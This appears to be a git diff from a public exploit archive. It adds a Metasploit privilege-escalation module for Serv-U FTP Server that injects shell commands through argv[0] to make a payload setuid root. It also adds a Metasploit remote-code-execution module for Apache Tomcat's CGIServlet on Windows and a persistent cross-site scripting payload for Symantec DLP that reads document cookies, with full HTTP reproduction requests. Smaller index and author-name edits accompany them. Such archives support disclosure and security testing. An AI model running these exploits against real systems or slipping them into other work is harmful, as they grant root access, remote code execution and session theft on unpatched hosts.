diff --git a/exploits/linux/local/47072.rb b/exploits/linux/local/47072.rb
new file mode 100755
index 000000000..a26288eb9
--- /dev/null
+++ b/exploits/linux/local/47072.rb
@@ -0,0 +1,172 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+ Rank = ExcellentRanking
+
+ include Msf::Post::File
+ include Msf::Post::Linux::Kernel
+ include Msf::Post::Linux::Priv
+ include Msf::Post::Linux::System
+ include Msf::Exploit::EXE
+ include Msf::Exploit::FileDropper
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Serv-U FTP Server prepareinstallation Privilege Escalation',
+ 'Description' => %q{
+ This module attempts to gain root privileges on systems running
+ Serv-U FTP Server versions prior to 15.1.7.
+
+ The `Serv-U` executable is setuid `root`, and uses `ARGV[0]`
+ in a call to `system()`, without validation, when invoked with
+ the `-prepareinstallation` flag, resulting in command execution
+ with root privileges.
+
+ This module has been tested successfully on Serv-U FTP Server
+ version 15.1.6 (x64) on Debian 9.6 (x64).
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Guy Levin', # @va_start - Discovery and exploit
+ 'bcoles' # Metasploit
+ ],
+ 'DisclosureDate' => '2019-06-05',
+ 'References' =>
+ [
+ ['CVE', '2019-12181'],
+ ['EDB', '47009'],
+ ['PACKETSTORM', '153333'],
+ ['URL', 'https://github.com/guywhataguy/CVE-2019-12181'],
+ ['URL', 'https://github.com/bcoles/local-exploits/tree/master/CVE-2019-12181'],
+ ['URL', 'https://blog.vastart.dev/2019/06/cve-2019-12181-serv-u-exploit-writeup.html'],
+ ['URL', 'https://documentation.solarwinds.com/en/success_center/servu/Content/Release_Notes/Servu_15-1-7_release_notes.htm'],
+ ['URL', 'https://support.solarwinds.com/SuccessCenter/s/article/Serv-U-Potential-elevation-of-privileges-on-Linux-systems']
+ ],
+ 'Platform' => ['linux'],
+ 'Arch' =>
+ [
+ ARCH_X86,
+ ARCH_X64,
+ ARCH_ARMLE,
+ ARCH_AARCH64,
+ ARCH_PPC,
+ ARCH_MIPSLE,
+ ARCH_MIPSBE
+ ],
+ 'SessionTypes' => ['shell', 'meterpreter'],
+ 'Targets' => [['Auto', {}]],
+ 'DefaultOptions' =>
+ {
+ 'PrependSetresuid' => true,
+ 'PrependSetresgid' => true,
+ 'PrependFork' => true,
+ 'WfsDelay' => 30
+ },
+ 'DefaultTarget' => 0))
+ register_options [
+ OptString.new('SERVU_PATH', [true, 'Path to Serv-U executable', '/usr/local/Serv-U/Serv-U'])
+ ]
+ register_advanced_options [
+ OptBool.new('ForceExploit', [false, 'Override check result', false]),
+ OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
+ ]
+ end
+
+ def servu_path
+ datastore['SERVU_PATH']
+ end
+
+ def base_dir
+ datastore['WritableDir'].to_s
+ end
+
+ def upload(path, data)
+ print_status "Writing '#{path}' (#{data.size} bytes) ..."
+ rm_f path
+ write_file path, data
+ register_file_for_cleanup path
+ end
+
+ def upload_and_chmodx(path, data)
+ upload path, data
+ chmod path
+ end
+
+ def check
+ unless command_exists? 'bash'
+ vprint_error 'bash shell is not available'
+ return CheckCode::Safe
+ end
+ vprint_good 'bash shell is available'
+
+ unless cmd_exec("test -x '#{servu_path}' && echo true").include? 'true'
+ vprint_error "#{servu_path} is not executable"
+ return CheckCode::Safe
+ end
+ vprint_good "#{servu_path} is executable"
+
+ unless setuid? servu_path
+ vprint_error "#{servu_path} is not setuid"
+ return CheckCode::Safe
+ end
+ vprint_good "#{servu_path} is setuid"
+
+ CheckCode::Detected
+ end
+
+ def exploit
+ unless check == CheckCode::Detected
+ unless datastore['ForceExploit']
+ fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
+ end
+ print_warning 'Target does not appear to be vulnerable'
+ end
+
+ if is_root?
+ unless datastore['ForceExploit']
+ fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
+ end
+ end
+
+ unless writable? base_dir
+ fail_with Failure::BadConfig, "#{base_dir} is not writable"
+ end
+
+ if nosuid? base_dir
+ fail_with Failure::BadConfig, "#{base_dir} is mounted nosuid"
+ end
+
+ payload_name = ".#{rand_text_alphanumeric 10..15}"
+ @payload_path = "#{base_dir}/#{payload_name}"
+ upload_and_chmodx @payload_path, generate_payload_exe
+
+ argv0 = %Q{\\";chown root #{@payload_path};chmod u+s #{@payload_path};chmod +x #{@payload_path}\\"}
+ cmd = %Q{bash -c 'exec -a "#{argv0}" #{servu_path} -prepareinstallation'}
+ vprint_status "Executing command: #{cmd}"
+ cmd_exec cmd
+
+ unless setuid? @payload_path
+ fail_with Failure::Unknown, 'Failed to set payload setuid root'
+ end
+ print_good "#{@payload_path} setuid root successfully"
+
+ print_status 'Executing payload...'
+ res = cmd_exec "#{@payload_path} &"
+ vprint_line res
+ end
+
+ def on_new_session(session)
+ if session.type.eql? 'meterpreter'
+ session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'
+ session.fs.file.rm @payload_path
+ else
+ session.shell_command_token "rm -f '#{@payload_path}'"
+ end
+ ensure
+ super
+ end
+end
\ No newline at end of file
diff --git a/exploits/linux/webapps/47059.txt b/exploits/linux/webapps/47059.txt
index 2f5c0bf58..d5d532897 100644
--- a/exploits/linux/webapps/47059.txt
+++ b/exploits/linux/webapps/47059.txt
@@ -3,7 +3,6 @@
# Date: 6/29/2019
# Exploit Author: Joey Lane
# Vendor Homepage: https://www.cyberpowersystems.com
-# Software Link: https://dl4jz3rbrsfum.cloudfront.net/software/ppbe340-linux-x86_64.sh
# Version: 3.4.0
# Tested on: Ubuntu 16.04
# CVE : Pending
diff --git a/exploits/multiple/webapps/47071.txt b/exploits/multiple/webapps/47071.txt
new file mode 100644
index 000000000..8981f58f8
--- /dev/null
+++ b/exploits/multiple/webapps/47071.txt
@@ -0,0 +1,81 @@
+# Exploit Title: Persistent XSS on Symantec DLP <= 15.5 MP1
+# Date: 2019-06-21
+# Exploit Author: Chapman Schleiss
+# Vendor Homepage: https://www.symantec.com/
+# Software Link: https://support.symantec.com/us/en/mysymantec.html
+# Version: <= 15.5 MP1
+# CVE : 2019-9701
+# Advisory-URL: https://support.symantec.com/us/en/article.SYMSA1484.html
+# Hot Fix: https://support.symantec.com/us/en/article.ALERT2664.html
+
+Description
+---------------
+Persistent XSS via 'name' param at
+/ProtectManager/enforce/admin/senderrecipientpatterns/list
+
+
+Payload: ' oNmouseover=prompt(document.domain,document.cookie) )
+Browser: Firefox 64, IE 11
+Date Observed: 15 January 2019
+
+
+Reproduction POST
+-----------------
+POST
+/ProtectManager/enforce/admin/senderrecipientpatterns/recipient_patterns/update
+HTTP/1.1
+Host: [snip].com:8443
+User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0)
+Gecko/20100101 Firefox/64.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: https://
+[snip].com:8443/ProtectManager/enforce/admin/senderrecipientpatterns/recipient_patterns/edit?id=41&version=30
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 558
+Connection: close
+
+name=%27+oNmouseover%3Dprompt%28document.domain%2Cdocument.cookie%29+%29&description=some_text&userPatterns=test%
+40test.com&ipAddresses=192.168.1.1&urlDomains=mail.company.com
+&id=41&version=30
+
+Reproduction GET
+----------------
+GET /ProtectManager/enforce/admin/senderrecipientpatterns/list HTTP/1.1
+Host: [snip].com:8443
+User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0)
+Gecko/20100101 Firefox/64.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: https://
+[snip].com:8443/ProtectManager/enforce/admin/senderrecipientpatterns/recipient_patterns/edit?id=41&version=30
+Connection: close
+
+Reproduction Response
+---------------------
+
\ No newline at end of file
diff --git a/exploits/windows/remote/47073.rb b/exploits/windows/remote/47073.rb
new file mode 100755
index 000000000..38879d7c9
--- /dev/null
+++ b/exploits/windows/remote/47073.rb
@@ -0,0 +1,131 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::CmdStager
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => 'Apache Tomcat CGIServlet enableCmdLineArguments Vulnerability',
+ 'Description' => %q{
+ This module exploits a vulnerability in Apache Tomcat's CGIServlet component. When the
+ enableCmdLineArguments setting is set to true, a remote user can abuse this to execute
+ system commands, and gain remote code execution.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Yakov Shafranovich', # Original discovery
+ 'sinn3r' # Metasploit module
+ ],
+ 'Platform' => 'win',
+ 'Arch' => [ARCH_X86, ARCH_X64],
+ 'Targets' =>
+ [
+ [ 'Apache Tomcat 9.0 or prior for Windows', { } ]
+ ],
+ 'References' =>
+ [
+ ['CVE', '2019-0232'],
+ ['URL', 'https://wwws.nightwatchcybersecurity.com/2019/04/30/remote-code-execution-rce-in-cgi-servlet-apache-tomcat-on-windows-cve-2019-0232/'],
+ ['URL', 'https://blog.trendmicro.com/trendlabs-security-intelligence/uncovering-cve-2019-0232-a-remote-code-execution-vulnerability-in-apache-tomcat/']
+ ],
+ 'Notes' =>
+ {
+ 'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK ],
+ 'Reliability' => [ REPEATABLE_SESSION ],
+ 'Stability' => [ CRASH_SAFE ]
+ },
+ 'CmdStagerFlavor' => 'vbs',
+ 'DefaultOptions' =>
+ {
+ 'RPORT' => 8080
+ },
+ 'Privileged' => false,
+ 'DisclosureDate' => 'Apr 10 2019', # Date of public advisory issued by the vendor
+ 'DefaultTarget' => 0
+ ))
+
+ register_options(
+ [
+ OptString.new('TARGETURI', [true, 'The URI path to CGI script', '/'])
+ ])
+
+ register_advanced_options(
+ [
+ OptBool.new('ForceExploit', [false, 'Override check result', false])
+ ])
+
+ deregister_options('SRVHOST', 'SRVPORT', 'URIPATH')
+ end
+
+ def check
+ sig = Rex::Text.rand_text_alpha(10)
+ uri = normalize_uri(target_uri.path)
+ uri << "?&echo+#{sig}"
+
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => uri
+ })
+
+ unless res
+ vprint_error('No Response from server')
+ return CheckCode::Unknown
+ end
+
+ if res.body.include?(sig)
+ return CheckCode::Vulnerable
+ end
+
+ CheckCode::Safe
+ end
+
+ def execute_command(cmd, opts={})
+ # Our command stager assumes we have access to environment variables.
+ # We don't necessarily have that, so we have to modify cscript to a full path.
+ cmd.gsub!('cscript', 'C:\\Windows\\System32\\cscript.exe')
+
+ uri = normalize_uri(target_uri.path)
+ uri << "?{CGI.escape(cmd)}"
+
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => uri
+ })
+
+ unless res
+ fail_with(Failure::Unreachable, 'No response from server')
+ end
+
+ unless res.code == 200
+ fail_with(Failure::Unknown, "Unexpected server response: #{res.code}")
+ end
+ end
+
+ # it seems we don't really have a way to retrieve the filenames from the VBS command stager,
+ # so we need to rely on the user to cleanup the files.
+ def on_new_session(cli)
+ print_warning('Make sure to manually cleanup the exe generated by the exploit')
+ super
+ end
+
+ def exploit
+ print_status("Checking if #{rhost} is vulnerable")
+ unless check == CheckCode::Vulnerable
+ unless datastore['ForceExploit']
+ fail_with(Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.')
+ end
+
+ print_warning('Target does not appear to be vulnerable.')
+ end
+
+ print_status("#{rhost} seems vulnerable, what a good day.")
+ execute_cmdstager(flavor: :vbs, temp: '.', linemax: 7000)
+ end
+end
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 11b13f218..bde51eef6 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -10564,6 +10564,7 @@ id,file,description,date,author,type,platform,port
47012,exploits/windows/local/47012.py,"Tuneclone 2.20 - Local SEH Buffer Overflow",2019-06-20,Achilles,local,windows,
47017,exploits/linux/local/47017.rb,"Cisco Prime Infrastructure - Runrshell Privilege Escalation (Metasploit)",2019-06-20,Metasploit,local,linux,
47070,exploits/macos/local/47070.rb,"Mac OS X TimeMachine - 'tmdiagnose' Command Injection Privilege Escalation (Metasploit)",2019-07-02,Metasploit,local,macos,
+47072,exploits/linux/local/47072.rb,"Serv-U FTP Server - prepareinstallation Privilege Escalation (Metasploit)",2019-07-03,Metasploit,local,linux,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -17518,6 +17519,7 @@ id,file,description,date,author,type,platform,port
47039,exploits/linux/remote/47039.rb,"Nagios XI 5.5.6 - Magpie_debug.php Root Remote Code Execution (Metasploit)",2019-06-26,Metasploit,remote,linux,
47047,exploits/linux/remote/47047.rb,"Linux Mint 18.3-19.1 - 'yelp' Command Injection (Metasploit)",2019-07-01,b1ack0wl,remote,linux,
47067,exploits/hardware/remote/47067.py,"FaceSentry Access Control System 6.4.8 - Remote SSH Root",2019-07-01,LiquidWorm,remote,hardware,
+47073,exploits/windows/remote/47073.rb,"Apache Tomcat - CGIServlet enableCmdLineArguments Remote Code Execution (Metasploit)",2019-07-03,Metasploit,remote,windows,8080
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -41437,14 +41439,14 @@ id,file,description,date,author,type,platform,port
47022,exploits/php/webapps/47022.txt,"SeedDMS versions < 5.1.11 - Remote Command Execution",2019-06-24,"Nimit Jain",webapps,php,
47027,exploits/multiple/webapps/47027.py,"GrandNode 4.40 - Path Traversal / Arbitrary File Download",2019-06-24,"Corey Robinson",webapps,multiple,
47033,exploits/hardware/webapps/47033.html,"Fortinet FCM-MB40 - Cross-Site Request Forgery / Remote Command Execution",2019-06-25,XORcat,webapps,hardware,
-47034,exploits/php/webapps/47034.txt,"AZADMIN CMS 1.0 - SQL Injection",2019-06-25,"felipe andrian",webapps,php,
+47034,exploits/php/webapps/47034.txt,"AZADMIN CMS 1.0 - SQL Injection",2019-06-25,"felipe andrian",webapps,php,80
47035,exploits/aspx/webapps/47035.py,"BlogEngine.NET 3.3.6/3.3.7 - 'path' Directory Traversal",2019-06-25,"Aaron Bishop",webapps,aspx,
-47036,exploits/php/webapps/47036.txt,"WordPress Plugin iLive 1.0.4 - Cross-Site Scripting",2019-06-25,m0ze,webapps,php,
-47037,exploits/php/webapps/47037.txt,"WordPress Plugin Live Chat Unlimited 2.8.3 - Cross-Site Scripting",2019-06-25,m0ze,webapps,php,
+47036,exploits/php/webapps/47036.txt,"WordPress Plugin iLive 1.0.4 - Cross-Site Scripting",2019-06-25,m0ze,webapps,php,80
+47037,exploits/php/webapps/47037.txt,"WordPress Plugin Live Chat Unlimited 2.8.3 - Cross-Site Scripting",2019-06-25,m0ze,webapps,php,80
47044,exploits/php/webapps/47044.py,"LibreNMS 1.46 - 'addhost' Remote Code Execution",2019-06-28,Askar,webapps,php,80
-47045,exploits/php/webapps/47045.txt,"WorkSuite PRM 2.4 - 'password' SQL Injection",2019-07-01,"Mehmet EMIROGLU",webapps,php,
-47046,exploits/php/webapps/47046.txt,"CiuisCRM 1.6 - 'eventType' SQL Injection",2019-07-01,"Mehmet EMIROGLU",webapps,php,
-47058,exploits/multiple/webapps/47058.txt,"Varient 1.6.1 - SQL Injection",2019-07-01,"Mehmet EMIROGLU",webapps,multiple,
+47045,exploits/php/webapps/47045.txt,"WorkSuite PRM 2.4 - 'password' SQL Injection",2019-07-01,"Mehmet EMIROGLU",webapps,php,80
+47046,exploits/php/webapps/47046.txt,"CiuisCRM 1.6 - 'eventType' SQL Injection",2019-07-01,"Mehmet EMIROGLU",webapps,php,80
+47058,exploits/multiple/webapps/47058.txt,"Varient 1.6.1 - SQL Injection",2019-07-01,"Mehmet EMIROGLU",webapps,multiple,80
47059,exploits/linux/webapps/47059.txt,"PowerPanel Business Edition - Cross-Site Scripting",2019-07-01,"Joey Lane",webapps,linux,
47060,exploits/php/webapps/47060.txt,"ZoneMinder 1.32.3 - Cross-Site Scripting",2019-07-01,"Joey Lane",webapps,php,
47061,exploits/multiple/webapps/47061.txt,"SAP Crystal Reports - Information Disclosure",2019-07-01,"Mohamed M.Fouad",webapps,multiple,
@@ -41454,3 +41456,4 @@ id,file,description,date,author,type,platform,port
47065,exploits/hardware/webapps/47065.txt,"FaceSentry Access Control System 6.4.8 - Cross-Site Request Forgery",2019-07-01,LiquidWorm,webapps,hardware,
47066,exploits/hardware/webapps/47066.py,"FaceSentry Access Control System 6.4.8 - Remote Root Exploit",2019-07-01,LiquidWorm,webapps,hardware,
47069,exploits/php/webapps/47069.py,"Centreon 19.04 - Remote Code Execution",2019-07-02,Askar,webapps,php,
+47071,exploits/multiple/webapps/47071.txt,"Symantec DLP 15.5 MP1 - Cross-Site Scripting",2019-07-03,"Chapman Schleiss",webapps,multiple,8443
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index e1208f284..f13582632 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -986,4 +986,4 @@ id,file,description,date,author,type,platform
47055,shellcodes/arm/47055.c,"Linux/ARM64 - mmap() + read() stager + execve(_/bin/sh__ NULL_ NULL) Shellcode (60 Bytes)",2019-07-01,"Ken Kitahara",shellcode,arm
47056,shellcodes/arm/47056.c,"Linux/ARM64 - Jump Back Shellcode + execve(_/bin/sh__ NULL_ NULL) Shellcode (8 Bytes)",2019-07-01,"Ken Kitahara",shellcode,arm
47057,shellcodes/arm/47057.c,"Linux/ARM64 - execve(_/bin/sh__ [_/bin/sh_]_ NULL) Shellcode (48 Bytes)",2019-07-01,"Ken Kitahara",shellcode,arm
-47068,shellcodes/linux_x86/47068.c,"Linux/x86 - execve(/bin/sh) using JMP-CALL-POP Shellcode (21 bytes)",2019-07-01,kiriknik,shellcode,linux_x86
+47068,shellcodes/linux_x86/47068.c,"Linux/x86 - execve(/bin/sh) using JMP-CALL-POP Shellcode (21 bytes)",2019-07-01,"Kirill Nikolaev",shellcode,linux_x86
diff --git a/shellcodes/linux_x86/47068.c b/shellcodes/linux_x86/47068.c
index 7d577ab0f..3de6c346d 100644
--- a/shellcodes/linux_x86/47068.c
+++ b/shellcodes/linux_x86/47068.c
@@ -2,7 +2,7 @@
;Category: Shellcode
;Title: GNU/Linux x86 - execve /bin/sh using JMP-CALL-POP technique (21
bytes)
-;Author: kiriknik
+;Author: Kirill Nikolaev
;Date: 01/07/2019
;Architecture: Linux x86